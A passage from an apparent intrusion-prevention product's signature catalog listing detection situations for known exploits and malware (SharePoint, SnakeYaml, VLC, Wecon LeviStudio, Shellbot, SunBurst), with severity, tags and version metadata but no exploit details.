Last changed: sgpkg-ips-1789-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-TextId_Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950

About this situation: An attempt to exploit a vulnerability in Sharepoint detected.
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2023-05, CVE2023, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1624-5242
Vulnerability: Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
Description:
Back to top

File-TextId_Shellbot-Malware

About this situation: Shellbot malware detected
Context: Identified Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Shellbot-Perl-Malware
Description:
Back to top

File-TextId_Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Siemens JT2Go detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens JT2Go, Siemens Teamcenter Visualization, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Vulnerability: Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection
Description:
Back to top

File-TextId_Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460

About this situation: An attempt to exploit a vulnerability in ALEOS ACEManager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ALEOS, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1715-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
Description:
Back to top

File-TextId_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

About this situation: An attempt to exploit a vulnerability in SnakeYaml detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SnakeYaml, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
Description:
Back to top

File-TextId_SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202

About this situation: An attempt to exploit a vulnerability in SoapUI detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SoapUI, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202
Description:
Back to top

File-TextId_Solarwinds-SunBurst-Beacon

About this situation: Beacon traffic of the Solarwinds SunBurst intrusion
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-TextId_SonicWall-Gms-Virtual-Appliance-Command-Injection

About this situation: An attempt to exploit a vulnerability in SonicWall GMS Virtual Appliance detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: SonicWall-Gms-Virtual-Appliance-Command-Injection
Description:
Back to top

File-TextId_Splunk-Enterprise-Code-Execution-CVE-2023-46214

About this situation: An attempt to exploit a vulnerability in Splunk Enterprise detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Splunk, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Splunk-Enterprise-Code-Execution-CVE-2023-46214
Description:
Back to top

File-TextId_Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow

About this situation: Suspicious XML-based JNLP file detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Start, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Web Start detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Web Start, Sun Java Development Kit, Sun Java 2 Software Development Kit, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow

About this situation: Attempt to exploit stack buffer overflow vulnerability in Sun Java Web Start detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Start, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
Description:
Back to top

File-TextId_Sun-Java-WebStart-Jnlp-Buffer-Overflow

About this situation: Crafted JNLP file with an excessively long codebase attribute detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Sun Java Runtime Environment, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Sun-Java-WebStart-Jnlp-Buffer-Overflow
Description:
Back to top

File-TextId_Suspicious-ASPX-File-Content-Upload

About this situation: A suspicious ASPX file upload detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Vulnerability: Suspicious-ASPX-File-Upload
Description:
Back to top

File-TextId_Suspicious-Internet-Shortcut-File

About this situation: A suspicious internet shortcut file was detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-11, MS2025-02, CVE2023, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Malicious-Internet-Shortcut-File
Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
Microsoft-Windows-NTLM-Hash-Disclosure-Vulnerability-CVE-2025-21377
Description:
Back to top

File-TextId_Suspicious-Java-Serialized-Object

About this situation: A suspicious Java serialized object detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1669-5242
Vulnerability: Ysoserial-Generated-Java-Serialized-Object
Description:
Back to top

File-TextId_Suspicious-Jsp-File-Upload

About this situation: A suspicious JSP file upload detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Suspicious-Jsp-File-Upload
Description:
Back to top

File-TextId_Suspicious-SettingContent-MS-File

About this situation: A suspicious settingcontent-ms file detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Vulnerability: Suspicious-SettingContent-MS-File
Description:
Back to top

File-TextId_Suspicious-Text-File

About this situation: A suspicious file detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-801-5242
Last changed: sgpkg-ips-801-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-TextId_Suspicious_Character_Data_Usage

About this situation: Suspicious traffic detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Description:
Back to top

File-TextId_Un4seen-XMPlay-Stack-Based-Buffer-Overflow

About this situation: A buffer overflow vulnerability in Un4seen XMPlay.
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Un4seen, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Un4seen-XMPlay-Stack-Based-Buffer-Overflow
Description:
Back to top

File-TextId_Unicode-Encoded-Obfuscated-Script-File

About this situation: Suspicious traffic detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-TextId_Very-Large-XML-File

About this situation: A very large XML file was found
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-502-5211
Vulnerability: Very-Large-XML-File
Description:
Back to top

File-TextId_Viber-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Viber detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Viber, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1177-5242
Vulnerability: Viber-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-TextId_VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow
Description:
Back to top

File-TextId_VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in VideoLAN VLC Media Player detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
Description:
Back to top

File-TextId_VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-BOF

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
Description:
Back to top

File-TextId_VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability
Description:
Back to top

File-TextId_VideoLAN-VLC-XSPF-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in VideoLAN Project VLC Media Player detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VideoLAN-VLC-XSPF-Memory-Corruption
Description:
Back to top

File-TextId_Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in VISAM VBASE Automation Base detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VISAM VBASE, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection
Description:
Back to top

File-TextId_Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in VISAM VBASE Automation Base detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VISAM VBASE, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1631-5242
Last changed: sgpkg-ips-1631-5242
Vulnerability: Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection
Description:
Back to top

File-TextId_Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in VISAM VBASE Automation Base detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VISAM VBASE, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection
Description:
Back to top

File-TextId_Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in VISAM VBASE Automation Base detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VISAM VBASE, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection
Description:
Back to top

File-TextId_VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_VMware-OVF-Tool-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in VMware OVF Tool detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware, CVE2012, Any Operating System not specific, EMC VMware not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: VMware-OVF-Tool-Format-String-Vulnerability
Description:
Back to top

File-TextId_Vtiger-CRM-PHP-Code-Injection

About this situation: An attempt to exploit a Vtiger CRM PHP Code Injection vulnerability detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, vTiger CRM, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1496-5242
Vulnerability: Vtiger-CRM-PHP-Code-Injection
Description:
Back to top

File-TextId_Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-805-5242
Vulnerability: Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1178-5242
Vulnerability: Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Vulnerability: Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Vulnerability: Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1223-5242
Vulnerability: Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Levistudio-String-Content-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Wecon-Levistudio-String-Content-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1474-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1447-5242
Last changed: sgpkg-ips-1447-5242
Vulnerability: Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Wecon LeviStudio, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1299-5242
Last changed: sgpkg-ips-1299-5242
Vulnerability: Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in WECON LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in LeviStudiU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1285-5242
Vulnerability: Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
